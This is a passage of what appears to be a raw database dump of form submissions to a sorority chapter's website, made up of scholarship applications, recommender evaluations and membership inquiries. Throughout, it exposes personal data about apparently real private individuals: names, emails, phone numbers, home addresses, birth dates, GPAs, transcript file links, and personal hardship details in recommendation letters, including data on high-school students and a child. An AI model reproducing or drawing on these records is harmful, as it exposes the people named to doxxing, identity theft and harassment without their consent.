Okoro'),(2379,225,8,4,'4 years'),(2380,225,8,5,'Teacher/Professor'),(2381,225,8,7,'Excellent'),(2382,225,8,9,'Excellent'),(2383,225,8,8,'Excellent'),(2384,225,8,14,'Please see attached letter.'),(2385,225,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/04/Okoro-Conway-Scholarship.pdf'),(2386,225,8,16,'Highly recommended'),(2387,226,7,1.3,'Arianna'),(2388,226,7,1.6,'Hope'),(2389,226,7,2,'en_hope@yahoo.com'),(2390,226,7,3,'Amicette Club'),(2391,226,7,4,'Hello! My name is Erika Hope and I am writing on behalf of my 11 yr old Arianna. I am sending you all this message in order to get some information about your Amicette Club. I would love to learn more about your program and possibly have my daughter benefit from your mentoring. Please contact me via email at your earliest convenience. Thank you in advance! \r\n\r\nErika Hope'),(2392,227,10,1.3,'Crystal'),(2393,227,10,1.6,'Walker'),(2394,227,10,3,'crystal_walker5@outlook.com'),(2395,227,10,5,'(919) 723-7518'),(2396,227,10,2,'Inactive Member (Reclaim)'),(2397,227,10,4,'Sign me up!'),(2398,228,10,1.3,'Crystal'),(2399,228,10,1.6,'Walker'),(2400,228,10,3,'crystal_walker5@outlook.com'),(2401,228,10,5,'(919) 723-7518'),(2402,228,10,2,'Inactive Member (Reclaim)'),(2403,228,10,4,'Sign me up!'),(2404,229,10,1.3,'Marsha'),(2405,229,10,1.6,'Adrien'),(2406,229,10,3,'mjadrien@gmail.com'),(2407,229,10,5,'(954) 483-1101'),(2408,229,10,2,'Inactive Member (Reclaim)'),(2409,229,10,4,'Hello Sorors,\r\n\r\nI am looking for a Zeta home.  I have been inactive for two years since moving from Florida to the DMV.'),(2410,230,6,18.3,'Diandra'),(2411,230,6,18.6,'Eason'),(2412,230,6,19.1,'6934 Knighthood Lane'),(2413,230,6,19.3,'Columbia'),(2414,230,6,19.4,'MD'),(2415,230,6,19.5,'21045'),(2416,230,6,19.6,'United States'),(2417,230,6,4,'05-22-80'),(2418,230,6,21,'djny05@gmail.com'),(2419,230,6,20,'(718) 614-9194'),(2420,230,6,10,'Oakland Mills High School'),(2421,230,6,27,'LGZ Website'),(2422,230,6,28,'N/A'),(2423,230,6,9,'3.0'),(2425,230,6,26,'PR'),(2426,230,6,12,'12'),(2427,230,6,14,'LGZ - 2nd Anti - 2017'),(2428,230,6,13,'Perfect Attendance - 2017'),(2429,230,6,36,'LGZ - Adopt-A-Road Cleanup - 2017'),(2430,230,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/08/Test.docx'),(2431,230,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/08/Test1.docx'),(2432,230,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/08/Test2.docx'),(2433,231,8,1.3,'Diandra'),(2434,231,8,1.6,'Minarovich'),(2435,231,8,11,'Oakland Mills HS'),(2436,231,8,12,'Math Teacher'),(2437,231,8,2,'djny05@gmail.com'),(2438,231,8,3,'Diandra Eason'),(2439,231,8,4,'1 year'),(2440,231,8,5,'Teacher/Professor'),(2441,231,8,7,'Excellent'),(2442,231,8,9,'Excellent'),(2443,231,8,8,'Excellent'),(2444,231,8,14,'Diandra is a very nice person.'),(2445,231,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/08/Test.docx'),(2446,231,8,16,'Highly recommended'),(2447,232,10,1.3,'Ada'),(2448,232,10,1.6,'Amadi'),(2449,232,10,3,'aa863@cornell.edu'),(2450,232,10,5,'(717) 819-7218'),(2451,232,10,2,'Interested in Membership'),(2452,232,10,4,'Hello,\r\n\r\nI am Ada Amadi, a recent graduate of Cornell University. I am interested in learning more about your chapter and volunteering at any events you host in the future.'),(2453,233,10,1.3,'Ada'),(2454,233,10,1.6,'Amadi'),(2455,233,10,3,'aa863@cornell.edu'),(2456,233,10,5,'(717) 819-7218'),(2457,233,10,2,'Interested in Membership'),(2458,233,10,4,'Hello,\r\n\r\nI am Ada Amadi, a recent graduate of Cornell University. I am interested in learning more about your chapter and volunteering at any events you host in the future.'),(2459,234,10,1.3,'Tiffany'),(2460,234,10,1.6,'Sion'),(2461,234,10,3,'Haigler84@gmail.com'),(2462,234,10,5,'(678) 764-2157'),(2463,234,10,2,'Current Active Member (Transfer)'),(2464,234,10,4,'Hi!  I am currently an active member with Phi Kappa Zeta in Woodbridge, VA, and I just recently relocated to Laurel, MD.  \r\n\r\nI would like to move to a chapter that is closer to me.'),(2465,235,10,1.3,'Tiajuana L.'),(2466,235,10,1.6,'Tillman, M.A.'),(2467,235,10,3,'TTillman@Students.TrinityDC.Edu'),(2468,235,10,5,'(202) 304-9962'),(2469,235,10,2,'Interested in Membership'),(2470,235,10,4,'Good afternoon, All!   I am currently a graduate student at Trinity Washington University in DC. There aren’t any Greek activities at this university; therefore, students are allowed to seek interest at other institutions. I have had Zeta members ask me to reach out, and after doing my research —I am glad that they did. I would be honored to join such a honest and considerate sisterhood. Please let me know of any interest meetings. Thank you, Kindly!'),(2471,236,10,1.3,'Tiajuana L.'),(2472,236,10,1.6,'Tillman, M.A.'),(2473,236,10,3,'TillmanT@Students.TrinityDC.Edu'),(2474,236,10,5,'(202) 304-9962'),(2475,236,10,2,'Interested in Membership'),(2476,236,10,4,'Good afternoon, All!\r\n  \r\n        I am currently a graduate student at Trinity Washington University-DC. There aren’t any Greek activities at this university; therefore, we are allowed to seek interest at other institutions. Recently, I have had Zeta members ask me to join, and after doing my research~ I’m glad they did. I would be honored to join a honest and considerate sisterhood. ...Please let me know of any interest meetings. Thank you, Kindly! ... Email: TillmanT@Students.TrinityDC.Edu'),(2477,237,6,18.3,'SANDRA'),(2478,237,6,18.6,'KAFORCHA'),(2479,237,6,19.1,'6544 Frietchie row'),(2480,237,6,19.3,'Columbia'),(2481,237,6,19.4,'Maryland'),(2482,237,6,19.5,'21045'),(2483,237,6,19.6,'United States'),(2484,237,6,4,'07-15-99'),(2485,237,6,21,'kaforcha1999@gmail.com'),(2486,237,6,20,'(410) 684-9104'),(2487,237,6,10,'Howard Community College'),(2488,237,6,27,'Friend/Family Member'),(2489,237,6,28,'N/A'),(2490,237,6,9,'3.2'),(2491,237,6,26,'Nursing'),(2492,237,6,12,'28 hours'),(2493,237,6,14,'1. African Society Association (ASA)- 2 years till present (Diligent Member)\r\n2.  Campus Disciples- 2 years till present (Member)\r\n3. Pre-nursing club- 1 year till present (Member)\r\n4. Rouse scholar at Howard Community College- 1 year till present \r\n5. Black Student Achievement Program (BSAP)- 2 years at Oakland Mills High School\r\n6. National Honors Society (NHS)- 2 years at Oakland Mills High School'),(2494,237,6,13,'1. Most outstanding student- (ESOL-  English for Speakers of Other Languages) at Oakland Mills High School 2017\r\n2. Principal\'s Honor roll- 2015, 2016 and 2017\r\n3. Certificate in honor of my volunteering at Lake Elkhorn Middle School\'s Ladies First program'),(2495,237,6,36,'VOLUNTEER SERVICE\r\n1. Wellness Center at Howard Community College                              2018-Present\r\n2. Winter growth  	April 20, 2018\r\n	  - Assisted the residents there, sang for them with other volunteers and organized games for them.\r\n3. Days End Farm Horse Rescue		    April 19, 2018\r\n	  - Aided the workers in cleaning up the stables and dispersing fresh straw to the horses.\r\n4.  Volunteer math tutor at Lake Elkhorn Middle School’s Ladies First program   2016-2017\r\n5. Scripture Union Executives, Nigeria						      2012-2014\r\n	  -Assisted scripture union teachers in teaching fellow students \r\n6. Grocery Shopping, Nigeria							      2012-2014\r\n	  -Helped elderly people in grocery shopping\r\n7. Multipurpose Hall Clean-up, Nigeria						      2012-2014\r\n	  -Helped to clean the school hall for events \r\n	  -Organized students who could help clean up the school\r\n8. Yard Sanitation, Nigeria								   2013\r\n	  -Helped to keep the community neat and tidy'),(2496,237,6,37,'1. Towson University\r\n2. University Of Maryland School Of Nursing\r\n3. Salisbury University\r\n4. Trinity Washington University\r\n5. Stevenson University'),(2497,237,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/10/W.Ruth-Conway-Scholarship.pdf'),(2498,237,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/10/Kaforcha_Sandra_0534285_10_15_2018.pdf'),(2499,237,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2018/10/image.pdf'),(2500,238,8,1.3,'Laura'),(2501,238,8,1.6,'McHugh'),(2502,238,8,11,'Howard Community College'),(2503,238,8,12,'Assistant Director of Honors'),(2504,238,8,2,'lmchugh@howardcc.edu'),(2505,238,8,3,'Sandra Kaforcha'),(2506,238,8,4,'1 year 2 months'),(2507,238,8,5,'Teacher/Professor'),(2508,238,8,7,'Excellent'),(2509,238,8,9,'Average'),(2510,238,8,8,'Excellent'),(2511,238,8,14,'I am attaching a file (letter of recommendation) for Sandra.  I am not confident that it is attaching.  If you have trouble opening the file, please email me at lmchugh@howardcc.edu and I will send it via email.\r\nThank you.\r\nLaura McHugh'),(2512,238,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/10/sandrakscholarship.doc.docx'),(2513,238,8,16,'Highly recommended'),(2514,239,8,1.3,'Laura'),(2515,239,8,1.6,'Cripps'),(2516,239,8,11,'Howard Community College'),(2517,239,8,12,'Dean, Social Sciences and Teacher Education; Director, Rouse Scholars Honors Program'),(2518,239,8,2,'lcripps@howardcc.edu'),(2519,239,8,3,'Sandra Kaforcha'),(2520,239,8,4,'18 months'),(2521,239,8,5,'Teacher/Professor'),(2522,239,8,7,'Excellent'),(2523,239,8,9,'Excellent'),(2524,239,8,8,'Excellent'),(2525,239,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/10/Sandra-Kaforcha.pdf'),(2526,239,8,16,'Highly recommended'),(2527,240,10,1.3,'Candice'),(2528,240,10,1.6,'Richard'),(2529,240,10,3,'candicerichard@msn.com'),(2530,240,10,5,'(443) 604-8807'),(2531,240,10,2,'Inactive Member (Reclaim)'),(2532,240,10,4,'I am looking for a chapter to reclaim into in the Baltimore City/County area.  I live in the Woodlawn/Catonsville area.   I was initiated in 1990 at Alpha Nu, College of New Paltz.'),(2533,241,10,1.3,'Mary - Margaret'),(2534,241,10,1.6,'Chantre'),(2535,241,10,3,'mmchantre@captechu.edu'),(2536,241,10,5,'(301) 602-2831'),(2537,241,10,2,'Inactive Member (Reclaim)'),(2538,241,10,4,'Greetings,\r\nI just got settled in the Maryland area and I want to become active in a grad chapter .'),(2539,242,10,1.3,'Leonora'),(2540,242,10,1.6,'Snead'),(2541,242,10,3,'Ladynora1920@gmail.com'),(2542,242,10,5,'(443) 805-5434'),(2543,242,10,2,'Current Active Member (Transfer)'),(2544,242,10,4,'Hello.. I hope all is well! \r\n\r\nI have heard great things about your chapter from my friend and soror Adena Maglinore and the state director. I would love to visit a chapter meeting as a part of my search for a new chapter. My current chapter does not meet my ethical and integral standards. I recently reclaimed this year during finerwomanhood month. I look forward to connecting and meeting you soon! \r\n\r\nSisterly Love, \r\nLeonora Snead'),(2545,243,10,1.3,'Leonora'),(2546,243,10,1.6,'Snead'),(2547,243,10,3,'Ladynora1920@gmail.com'),(2548,243,10,5,'(443) 805-5434'),(2549,243,10,2,'Current Active Member (Transfer)'),(2550,243,10,4,'Hello.. I hope all is well! \r\n\r\nI have heard great things about your chapter from my friend and soror Adena Maglinore and the state director. I would love to visit a chapter meeting as a part of my search for a new chapter. My current chapter does not meet my ethical and integral standards. I recently reclaimed this year during finerwomanhood month. I look forward to connecting and meeting you soon! \r\n\r\nSisterly Love, \r\nLeonora Snead'),(2551,244,8,1.3,'Maureen'),(2552,244,8,1.6,'Marshall'),(2553,244,8,11,'Howard Community college'),(2554,244,8,12,'Associate Director, Career links'),(2555,244,8,2,'mmarshall@howardcc.edu'),(2556,244,8,3,'Tierra Dixon'),(2557,244,8,4,'6 months'),(2558,244,8,5,'Advisor/Counselor'),(2559,244,8,7,'Excellent'),(2560,244,8,9,'Excellent'),(2561,244,8,8,'Excellent'),(2562,244,8,14,'Ms. Dixon joined career links in fall 2018.  I have been impressed with her dedication and work ethic since I first met her,  She is organized, hardworking and maintains a high GPA in HCC\'s competitive nursing program while raising her children and working. despite hardship in the last year, and there have been many that are very serious, nothing has deterred her.  She remains positive and works hard to stay on track.  Ms. Dixon stays in touch with me and follow through on every resources I send her way. Her positive attitude fills the room when she is present.  She is an excellent student and will be an excellent nurse.'),(2563,244,8,16,'Highly recommended'),(2564,245,8,1.3,'Maureen'),(2565,245,8,1.6,'Marshall'),(2566,245,8,11,'Howard Community College'),(2567,245,8,12,'Associate Director, Career Links'),(2568,245,8,2,'mmarshall@howardcc.edu'),(2569,245,8,3,'Flavie Adja'),(2570,245,8,4,'1.5 years'),(2571,245,8,5,'Advisor/Counselor'),(2572,245,8,7,'Excellent'),(2573,245,8,9,'Excellent'),(2574,245,8,8,'Excellent'),(2575,245,8,14,'Ms. Adja is a remarkable student.  She works and maintains a good GPA while raising her family.  She is positive and never gets discouraged when obstacles arise.  She has limited access to financial aid due to some federal regulations but she saves money to support her education since she knows it will lead to a better job and it is a good example for her children.  She never seem to run out of energy or positivity.  I am confident she will achieve all her educational goals with great success.'),(2576,245,8,16,'Highly recommended'),(2577,246,6,18.3,'tishae'),(2578,246,6,18.6,'lee'),(2579,246,6,19.1,'960 southerly rd J279'),(2580,246,6,19.2,'1588 wiliiams ave'),(2581,246,6,19.3,'Towson'),(2582,246,6,19.4,'Maryland'),(2583,246,6,19.5,'21204'),(2584,246,6,19.6,'United States'),(2585,246,6,4,'04-12-90'),(2586,246,6,21,'tishae.lee@howardcc.edu'),(2587,246,6,20,'(410) 805-1923'),(2588,246,6,10,'Howard Community College'),(2589,246,6,27,'HCC Women of Color Program'),(2590,246,6,28,'N/A'),(2591,246,6,9,'3.2'),(2592,246,6,26,'Nursing'),(2593,246,6,12,'69'),(2594,246,6,14,'no at this time'),(2595,246,6,13,'deans list 2004-2008'),(2596,246,6,36,'n/a'),(2597,246,6,37,'Howard community college\r\nuniversity of Baltimore'),(2598,246,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/01/Document.docx'),(2599,246,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/01/Document1.docx'),(2600,246,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/01/Document2.docx'),(2601,247,6,18.3,'Lucas'),(2602,247,6,18.6,'Teshome'),(2603,247,6,19.1,'10628 Quarterstaff Road'),(2604,247,6,19.3,'Columbia'),(2605,247,6,19.4,'MD'),(2606,247,6,19.5,'21044'),(2607,247,6,19.6,'United States'),(2608,247,6,4,'03-26-01'),(2609,247,6,21,'lucas.teshome@gmail.com'),(2610,247,6,20,'(240) 462-9347'),(2611,247,6,10,'Atholton High School'),(2612,247,6,27,'BSAP Advisor'),(2613,247,6,28,'N/A'),(2614,247,6,9,'3.71'),(2615,247,6,26,'Exercise Science/PT'),(2616,247,6,12,'NA'),(2617,247,6,14,'Black Student Union 2018-2019\r\nAlpha Achievers 2018-2019\r\nLetterman Club 2018-2019'),(2618,247,6,13,'Honor Roll- every quarter from 2017-2019\r\nLetter Award 2018'),(2619,247,6,36,'July of 2014-2017           \r\nGenOn Youth Summit. For the past three summers I have helped at a kids center, a warehouse owned by Appalachian Outreach, and an elderly home. Most work was laborious, either cleaning, organizing, renovation, etc. However, this work taught me valuable lessons of selflessness, discipline, and the importance of giving back.\r\n\r\nCold Weather Shelter \r\nDecember 2018\r\nThis is a program many churches in Howard County Participate in. During the cold, winter months, churches open up their facilities as shelter for homeless people. They keep them overnight, provide transportation to events during the day, and feed them dinner. Members of the church help prepare and serve dinner meals. I was fortunate enough to help prepare and serve meals for this program many years in a row. Most recently I participated in December 2018 with the Alpha Achievers at my school.'),(2620,247,6,37,'Lebanon Valley College\r\nArcadia University\r\nLycoming College\r\nShenandoah University'),(2621,247,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/01/W.-Ruth-Conway-Scholarship-Essay.docx'),(2622,247,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/01/Unofficial-High-School-Transcript.docx'),(2623,247,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/01/LGZScholarshipReleaseForm.pdf'),(2624,248,10,1.3,'Faith'),(2625,248,10,1.6,'Taylor'),(2626,248,10,3,'Faithtaylor25@gmail.com'),(2627,248,10,5,'(301) 686-4818'),(2628,248,10,2,'Interested in Membership'),(2629,248,10,4,'My name is Faith Taylor. I graduated from the University of Tampa on December 15 2018. That being said I am very interested in being a member of Zeta Phi Beta incorporated. I was wondering if you would be able to guide me in the right direction of who to contact so that I can get more information about joining a post undergraduate chapter in the Howard county  area. I am from Howard county originally and I will be returning to the area within the next few months. Thank you for your time and consideration.'),(2630,249,8,1.3,'Zethene'),(2631,249,8,1.6,'Spinner'),(2632,249,8,11,'Howard Community College'),(2633,249,8,12,'Instructional Specialist'),(2634,249,8,2,'zspinner@howardcc.edu'),(2635,249,8,3,'Flavie Adja'),(2636,249,8,4,'10+ years'),(2637,249,8,5,'Other'),(2638,249,8,6,'Friend, Mentor, Former Church Members'),(2639,249,8,7,'Excellent'),(2640,249,8,9,'Excellent'),(2641,249,8,8,'Excellent'),(2642,249,8,14,'I\'ve know Mrs. Adja for over ten years.  I have observed her commitment in various leadership roles and her impeccable ability to do so with integrity.  I highly recommend her for a W. Ruth Conway Scholarship.'),(2643,249,8,16,'Highly recommended'),(2644,250,10,1.3,'Erica'),(2645,250,10,1.6,'Rambus'),(2646,250,10,3,'ericaknows11@gmail.com'),(2647,250,10,5,'(704) 919-7378'),(2648,250,10,2,'Inactive Member (Reclaim)'),(2649,250,10,4,'Good Afternoon, \r\nHope all is well. \r\nI  am currently inactive, however. I would like to reclaim my membership. What is the process? \r\n\r\nThank you! \r\n\r\nErica Rambus'),(2650,251,10,1.3,'Julia'),(2651,251,10,1.6,'Donkin'),(2652,251,10,3,'julia@thefibrespa.com'),(2653,251,10,5,'(301) 655-2356'),(2654,251,10,2,'Interested in Membership'),(2655,251,10,4,'Hello, I\'m interested in attending a membership meeting for consideration as a member in your chapter.  I have a BS from the US Air Force Academy (1984) and an MS from Johns Hopkins University (1998).   My aunt, who lives in North Carolina,  is currently an active Zeta and my mother, who has passed, had been a Zeta.  Please let me know if you need more information, \r\nRespectfully, \r\nJulia'),(2656,252,10,1.3,'Beverly'),(2657,252,10,1.6,'Robinson'),(2658,252,10,3,'beverly.th@gmail.com'),(2659,252,10,5,'(201) 247-0045'),(2660,252,10,2,'Interested in Membership'),(2661,252,10,4,'Hello Ms. Williams,\r\nI am interested in becoming a member of this awesome sorority.  The principles and morals Zeta is founded on is what I have a passion for. I would love to attend an information session to meet you and learn more about the sorority and the Howard county chapter. \r\n\r\nThank you, \r\nBeverly Robinson'),(2662,253,10,1.3,'Toya'),(2663,253,10,1.6,'Winfrey'),(2664,253,10,3,'ablulady@gmail.com'),(2665,253,10,5,'(937) 241-1828'),(2666,253,10,2,'Inactive Member (Reclaim)'),(2667,253,10,4,'Hello,\r\nLooking for a  local chapter to become active again (reclaim).\r\n\r\nThank you,\r\nToya'),(2668,254,8,1.3,'Denise'),(2669,254,8,1.6,'Jefferson'),(2670,254,8,11,'Frostburg University'),(2671,254,8,12,'RN'),(2672,254,8,2,'jefferdx11@gmail.com'),(2673,254,8,3,'Kendra waters'),(2674,254,8,4,'5 years'),(2675,254,8,5,'Other'),(2676,254,8,6,'Nursing supervisor'),(2677,254,8,7,'Excellent'),(2678,254,8,9,'Excellent'),(2679,254,8,8,'Excellent'),(2680,254,8,14,'Kendra is a a caregiver at the nursing home where I work. She has good communication skills with her patients and her peers . She is the go to person for everyone myself included. She is maintains excellent grades while working full time a single parent with four kids. Kendra is amazing and she deserves a scholarship to help her reach her goals.'),(2681,254,8,16,'Highly recommended'),(2682,255,8,1.3,'Jessie'),(2683,255,8,1.6,'Moore'),(2684,255,8,11,'Atholton High School'),(2685,255,8,12,'Teacher'),(2686,255,8,2,'jessie_moore@hcpss.org'),(2687,255,8,3,'Lucas Teshome'),(2688,255,8,4,'1 year'),(2689,255,8,5,'Advisor/Counselor'),(2690,255,8,7,'Excellent'),(2691,255,8,9,'Excellent'),(2692,255,8,8,'Excellent'),(2693,255,8,14,'Lucas is one of the most intelligent and responsible students here at Atholton. I have had the pleasure of being a mentor and advisor to him through the Alpha Achiever program. I have also had the opportunity to work with him on several community service events. He is a leader and great role model for younger and less inspired students. I have seen nothing less than excellence from him in the year that I have known him. He comes highly recommended and I look forward to great things from him.'),(2694,255,8,16,'Highly recommended'),(2695,256,8,1.3,'Natalya'),(2696,256,8,1.6,'Stolyarova'),(2697,256,8,11,'Harmony Hall Assisted Living Facility'),(2698,256,8,12,'Registered Nurse - Nurse-Manager'),(2699,256,8,2,'nstolyarova@lorienhealth.com'),(2700,256,8,3,'Kendra Waters'),(2701,256,8,4,'3 1/2 years'),(2702,256,8,5,'Other'),(2703,256,8,6,'Nurse-Manager-Supervisor'),(2704,256,8,7,'Excellent'),(2705,256,8,9,'Excellent'),(2706,256,8,8,'Excellent'),(2707,256,8,14,'Above applicant is an excellent at what she does - taking care of elderly. She is very professional, caring, compassionate and empathetic. She provides an excellent care to her residents. She has an astute observation skills, able to follow set rules and protocols, has an excellent time management and organizational skills. She is a team player and a valuable employee to our company. Kendra works hard, taking care of her wonderful children and trying to continue with her education to provide a better life for her family.  I think this scholarship would help Kendra to get closer to her dream to graduate with higher degree.'),(2708,256,8,16,'Highly recommended'),(2709,257,8,1.3,'Scott'),(2710,257,8,1.6,'Hoffman'),(2711,257,8,11,'Christ Memorial Presbyterian Church'),(2712,257,8,12,'Pastor'),(2713,257,8,2,'swh2102@yahoo.com'),(2714,257,8,3,'Lucas Teshome'),(2715,257,8,4,'7 years'),(2716,257,8,5,'Other'),(2717,257,8,6,'I am Lucas\'s Pastor'),(2718,257,8,7,'Excellent'),(2719,257,8,9,'Excellent'),(2720,257,8,8,'Excellent'),(2721,257,8,14,'Lucas Teshome is a remarkable young man with a sharp mind and kind heart.  As his pastor, I can speak to his superb character and deep faith, his concern for others and his desire to make the world a better place.  Throughout the years I have known him Lucas has given generously and joyfully of his time and energy to numerous community outreach efforts.  He continues to be a role model for his peers and especially for the younger children of our congregation.  I highly recommend him for this scholarship and have no doubts he would prove himself worthy of its award and represent it well.'),(2722,257,8,16,'Highly recommended'),(2723,258,6,18.3,'Flavie'),(2724,258,6,18.6,'Adja'),(2725,258,6,19.1,'10799 Hickory Ridge Rd #141'),(2726,258,6,19.2,'N/A'),(2727,258,6,19.3,'Columbia'),(2728,258,6,19.4,'MD'),(2729,258,6,19.5,'21044'),(2730,258,6,19.6,'United States'),(2731,258,6,4,'12/01/1978'),(2732,258,6,21,'peacelambs7@gmail.com'),(2733,258,6,20,'(410) 372-7712'),(2734,258,6,10,'Howard Community College'),(2735,258,6,27,'School Counselor/Advisor'),(2736,258,6,28,'N/A'),(2737,258,6,9,'3.00'),(2738,258,6,26,'Nursing'),(2739,258,6,12,'34'),(2740,258,6,14,'Getting /Stay Ahead Program in Howard County MD  4 years , member\r\nToastmasters Columbia, MD  2 years,member\r\nImmanuel Church/LWIC Minister 2006-Present'),(2741,258,6,13,'N/A'),(2742,258,6,36,'Classical Christian Conversations; Tutor and Assistant Tutor 2011-2018\r\nImmanuel Church:Nursery Coordinator 2007-2014\r\n                                         Celebration Place Coordinator 2015-2018\r\nImmigration Liaison for French Community : 2004-2005\r\nBoard Member at Children Landcare Center International 2008-Present\r\nInterpreter at Firn    2014-Present\r\nInterpreter at Howard County Public School 2018-Present'),(2743,258,6,37,'Howard Community College\r\nUniversity of Maryland\r\nExcelsior Online'),(2744,258,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/01/Essay-Scholarship.doc'),(2745,258,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/01/SHCLS_ECO_C19013122120.pdf'),(2746,258,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/01/LGZScholarshipReleaseForm1.pdf'),(2747,259,6,18.3,'Kendra'),(2748,259,6,18.6,'Waters'),(2749,259,6,19.1,'11867 Blue February Way'),(2750,259,6,19.3,'Columbia'),(2751,259,6,19.4,'MD'),(2752,259,6,19.5,'21044'),(2753,259,6,19.6,'United States'),(2754,259,6,4,'07-05-87'),(2755,259,6,21,'waters_kendra@yahoo.com'),(2756,259,6,20,'(443) 529-2748'),(2757,259,6,10,'Howard Community College'),(2758,259,6,27,'Other'),(2759,259,6,28,'HCC’s career links'),(2760,259,6,9,'3.0'),(2761,259,6,26,'Nursing'),(2762,259,6,12,'4.6'),(2763,259,6,14,'N/a'),(2764,259,6,13,'N/a'),(2765,259,6,36,'N/a'),(2766,259,6,37,'Howard Community college \r\nCopping state university\r\nMorgan state university'),(2767,259,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/02/1991_001.pdf'),(2768,259,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/02/Copy-of-Copy-of-Image.docx'),(2769,259,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/02/Kendra-Waters-3.pdf'),(2770,260,6,18.3,'Maxwell'),(2771,260,6,18.6,'Myers'),(2772,260,6,19.1,'5111 Dawns Way'),(2773,260,6,19.3,'Ellicott City'),(2774,260,6,19.4,'MD'),(2775,260,6,19.5,'21043'),(2776,260,6,19.6,'United States'),(2777,260,6,4,'10-11-2001'),(2778,260,6,21,'millermyers@hotmail.com'),(2779,260,6,20,'(410) 443-1147'),(2780,260,6,10,'Howard High School'),(2781,260,6,27,'Social Media'),(2782,260,6,28,'n/a'),(2783,260,6,9,'3.05'),(2784,260,6,26,'Computer Science'),(2785,260,6,12,'n/a'),(2786,260,6,14,'President, Alpha Achievers Education Program, Howard High School\r\nCo-President, Student Advisory Board Howard County Library Elkridge Branch \r\nCaptain, 2018 - 2019 Boys Varsity Track Team \r\nSecretary, Black Student Union, Howard High School'),(2787,260,6,13,'2018 Howard High School National Honor Society\r\n2015 Presidential Award for Academic Excellence\r\nHonor Roll (2016 - Present)\r\n2016 USDA STEM Camp presenter at the Executive Offices of the President\r\nHoward High School Scholar Athlete (2017 - Present) \r\nDecember 2018, MileSplit Maryland Boys Track Athlete of the Week'),(2788,260,6,36,'The People’s Community Baptist Church, Silver Spring, MD 2010 - Present:\r\nSHARE Food Network, Usher Ministry, Young Voices of Praise Choir Member, and Various Sunday School productions and Community Outreach programs.\r\n\r\nHelping Up Mission, Baltimore, MD 2010 - Present\r\nServe meals to 200+ individuals.\r\n\r\nHoward County Library, Elkridge, MD 2010 - Present\r\nSummer reading program volunteer; Teen advisory board member.\r\n\r\nAlpha Achievers Education Program of Howard High School, 2018 - Present\r\nAssist middle-school students with homework.\r\n\r\nSalvation Army, Baltimore, MD  2015 - Present\r\nSort toys for distribution to underserved families.'),(2789,260,6,37,'University of Maryland\r\nUMBC'),(2790,260,6,35,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/02/Essay_-Maxwell-Myers_02102019.docx'),(2791,260,6,33,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/02/Transcript-Maxwell-Myers.pdf'),(2792,260,6,34,'https://zphiblgz.org/wp-content/uploads/gravity_forms/6-84b9c7429a87e5149bf51149a319c9c7/2019/02/Photo-Release-Form.pdf'),(2793,261,8,1.3,'Greg'),(2794,261,8,1.6,'Metzger'),(2795,261,8,11,'Howard High School'),(2796,261,8,12,'Teacher (Math)'),(2797,261,8,2,'greg_metzger@hcpss.org'),(2798,261,8,3,'Maxwell Myers'),(2799,261,8,4,'Since August of 2017'),(2800,261,8,5,'Teacher/Professor'),(2801,261,8,7,'Excellent'),(2802,261,8,9,'Excellent'),(2803,261,8,8,'Excellent'),(2804,261,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2019/02/Max-M-Scholarship-Rec.pdf'),(2805,261,8,16,'Highly recommended'),(2806,262,10,1.3,'Shaunice'),(2807,262,10,1.6,'Stanley'),(2808,262,10,3,'sstanley1920@yahoo.com'),(2809,262,10,5,'(240) 678-2984'),(2810,262,10,2,'Inactive Member (Reclaim)'),(2811,262,10,4,'Hello,\r\nI’m looking for a home to reclaim with and would be interested in attending any upcoming events and/or chapter meeting.\r\nLooking forward to connecting!\r\nShaunice'),(2812,263,10,1.3,'Dondra'),(2813,263,10,1.6,'Davenport'),(2814,263,10,3,'ddavenport2320@gmail.com'),(2815,263,10,5,'(443) 994-9069'),(2816,263,10,2,'Interested in Membership'),(2817,263,10,4,'Thank you for allowing me to submit my information.'),(2818,264,8,1.3,'Terri'),(2819,264,8,1.6,'HIll'),(2820,264,8,11,'Maryland General 